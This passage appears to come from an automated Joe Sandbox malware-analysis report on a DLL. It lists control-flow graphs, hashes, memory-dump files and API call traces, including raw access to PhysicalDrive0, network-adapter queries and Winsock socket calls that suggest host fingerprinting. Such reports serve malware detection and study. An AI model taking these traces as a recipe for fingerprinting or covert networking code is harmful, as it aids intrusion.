                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Wait$CloseExchangeHandleInterlockedMultipleObjectObjectsQueueSingleTerminateThreadUser
                              • String ID:
                              • API String ID: 1946104331-0
                              • Opcode ID: eb34f3ecc8176454b0c902c2ecc5c45246b43e77a52d1637e4571ecaa010c9f5
                              • Instruction ID: 3d72680eb2064c7c502750b86edb8edd9f0fb743374e52595c0ac7bad563716d
                              • Opcode Fuzzy Hash: eb34f3ecc8176454b0c902c2ecc5c45246b43e77a52d1637e4571ecaa010c9f5
                              • Instruction Fuzzy Hash: 1CF03631604205FFDF909F94DD09FA97BB8EF0A761F204659F56AA26D0DB7168009B60

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 706 6ceb3135-6ceb314f 707 6ceb3163-6ceb3167 706->707 708 6ceb3151-6ceb315e call 6cebe893 706->708 710 6ceb3169-6ceb316c 707->710 711 6ceb3181 707->711 716 6ceb32c6 708->716 710->711 713 6ceb316e-6ceb317c call 6cec9270 710->713 714 6ceb3184-6ceb31b4 WSASetLastError WSARecv call 6cebe8bd 711->714 713->716 718 6ceb31b9-6ceb31c2 714->718 719 6ceb32c8-6ceb32ce 716->719 721 6ceb31cb-6ceb31d1 718->721 722 6ceb31c4-6ceb31c9 718->722 724 6ceb31e3-6ceb31e5 721->724 725 6ceb31d3 721->725 723 6ceb31d8-6ceb31df call 6cebe893 722->723 723->724 727 6ceb31ec-6ceb31fd call 6cec9270 724->727 728 6ceb31e7-6ceb31ea 724->728 725->723 727->719 730 6ceb3203-6ceb3206 727->730 728->730 733 6ceb3208-6ceb320a 730->733 734 6ceb3210-6ceb3213 730->734 733->734 736 6ceb32bd-6ceb32c1 call 6cebe8ff 733->736 734->716 735 6ceb3219-6ceb3236 call 6cebe869 call 6ceb196a 734->735 742 6ceb3238-6ceb3255 call 6cebe869 call 6ceb196a 735->742 743 6ceb3257-6ceb3295 WSASetLastError select call 6cebe8bd 735->743 736->716 742->716 742->743 749 6ceb32a3 743->749 750 6ceb3297-6ceb32a1 call 6cec9270 743->750 751 6ceb32b0-6ceb32b2 749->751 752 6ceb32a5-6ceb32ad call 6cec9270 749->752 756 6ceb32b4-6ceb32b8 750->756 751->716 751->756 752->751 756->714
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 70a21f4a3b5d9224790280d36d852fb59480ff5ca14517a58d176ef691967c22
                              • Instruction ID: 849b80410ec3ebff0240a6cb68fa5f7f583d20dd879c976475cdcdd6d6d513c7
                              • Opcode Fuzzy Hash: 70a21f4a3b5d9224790280d36d852fb59480ff5ca14517a58d176ef691967c22
                              • Instruction Fuzzy Hash: 0741B472609701AFE7008F64CA02BAA7BF8AF4536CF24091DF595A7AC0EF74D5098B91

                              Control-flow Graph

                              APIs
                                • Part of subcall function 6CEC8003: CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000,00000000,?), ref: 6CEC8022
                                • Part of subcall function 6CEC8003: DeviceIoControl.KERNELBASE(00000000,002D1400,98BADCFE,0000000C,?,00000400,?,00000000), ref: 6CEC8060
                                • Part of subcall function 6CEC8003: GetLastError.KERNEL32 ref: 6CEC80C1
                                • Part of subcall function 6CEC8003: CloseHandle.KERNELBASE(?), ref: 6CEC80F8
                                • Part of subcall function 6CEC8107: LoadLibraryA.KERNEL32(iphlpapi.dll,?), ref: 6CEC811D
                                • Part of subcall function 6CEC8107: GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 6CEC8136
                                • Part of subcall function 6CEC8107: GetAdaptersInfo.IPHLPAPI(?,00000000,?,00000000), ref: 6CEC815B
                                • Part of subcall function 6CEC8107: FreeLibrary.KERNEL32(00000000), ref: 6CEC81E4
                              • GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,?), ref: 6CEC7F97
                              • CreateFileA.KERNELBASE(?,00100000,00000007,00000000,00000003,02000000,00000000,?,?,?), ref: 6CEC7FB9
                              • GetFileTime.KERNEL32(00000000,?,00000000,00000000,?,?,?), ref: 6CEC7FCE
                              • CloseHandle.KERNEL32(00000000,?,?,?), ref: 6CEC7FD7
                                • Part of subcall function 6CEC7DDB: _memmove.LIBCMT ref: 6CEC7E99
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleLibrary$AdaptersAddressControlDeviceDirectoryErrorFreeInfoLastLoadProcTimeWindows_memmove
                              • String ID:
                              • API String ID: 1782583926-0
                              • Opcode ID: 222f6cfe73c37d967e5ecaad4cde69b3c132fbcd2dbd0433c340a691d10046ae
                              • Instruction ID: af1890d0b685a7552884519956ebcf6838ee83a1eb87138a246a77b01ee48db3
                              • Opcode Fuzzy Hash: 222f6cfe73c37d967e5ecaad4cde69b3c132fbcd2dbd0433c340a691d10046ae
                              • Instruction Fuzzy Hash: 6F11E1726093015BC610DE25CC84EDBBBFCAB89AA4F100A1DB4A593290DF70860DC7E3

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 772 6ceb219a-6ceb21e8 call 6cedd8f0 SetEvent * 2 SleepEx
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CEB219A
                              • SetEvent.KERNEL32(00000000), ref: 6CEB21AE
                              • SetEvent.KERNEL32(?), ref: 6CEB21C7
                              • SleepEx.KERNELBASE(000000FF,00000001), ref: 6CEB21D1
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Event$H_prologSleep
                              • String ID:
                              • API String ID: 1765829285-0
                              • Opcode ID: baffbff9f92698a917dcb8cae238513c90789242179eeffd54e92f1dbf76aef3
                              • Instruction ID: 4b9e8b4499e3e66764b8cd46d56c9134c2ceb54e9cc471f5d6e2b7f5c4c51369
                              • Opcode Fuzzy Hash: baffbff9f92698a917dcb8cae238513c90789242179eeffd54e92f1dbf76aef3
                              • Instruction Fuzzy Hash: 23F03A36640150EFCB019FA4D888B98BBB0FF0D351F1482A9F9099B290CB399940DB60

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: 27a89261805411ffd59873fec39c5fcddfb07443aad05fdce3371c83a01242f5
                              • Instruction ID: d09e76041d62dd2fec277912c3a633308ef05aaf93e0958768411de458a229a1
                              • Opcode Fuzzy Hash: 27a89261805411ffd59873fec39c5fcddfb07443aad05fdce3371c83a01242f5
                              • Instruction Fuzzy Hash: CD416071604206DFCB08CF58D545BAABBB0FF09324F20855EF969AB780DB74E915CB91
                              APIs
                              • WSASetLastError.WS2_32(00000000,?,?,?,6CEF14A0,?,6CEB3DEE,6CEB9E69,?,00000000,?,?,?,?,6CEBC89D,6CEF14A0), ref: 6CEB34E8
                              • WSASocketA.WS2_32(6CEF14A0,?,00000000,00000000,00000000,00000001), ref: 6CEB34FD
                                • Part of subcall function 6CEBE8BD: WSAGetLastError.WS2_32(00000000,?,?,?,6CEB3747,00000000), ref: 6CEBE8C8
                              • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 6CEB3528
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast$Socketsetsockopt
                              • String ID:
                              • API String ID: 2093263913-0
                              • Opcode ID: 85e36cbf6aaaaf3d7bbdcde1d69a4dc7ef5d164f4bc83e79c313af4cd7da9c2a
                              • Instruction ID: 519313b0cd00b54ff81901b2074483e7ab51acff82cc305d8ec2e4c359d9eeb9
                              • Opcode Fuzzy Hash: 85e36cbf6aaaaf3d7bbdcde1d69a4dc7ef5d164f4bc83e79c313af4cd7da9c2a
                              • Instruction Fuzzy Hash: 51F0F472702214BBEB204AA5DD49FAA77BCDB097B5F200155F618AB2C0DF718C0083E0
                              APIs
                              • __beginthreadex.LIBCMT ref: 6CECA876
                              • CloseHandle.KERNEL32(?,00000000,?,?,?,?,?,6CEB4CE4), ref: 6CECA8A7
                              • ResumeThread.KERNELBASE(?,00000000,?,?,?,?,?,6CEB4CE4), ref: 6CECA8B5
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
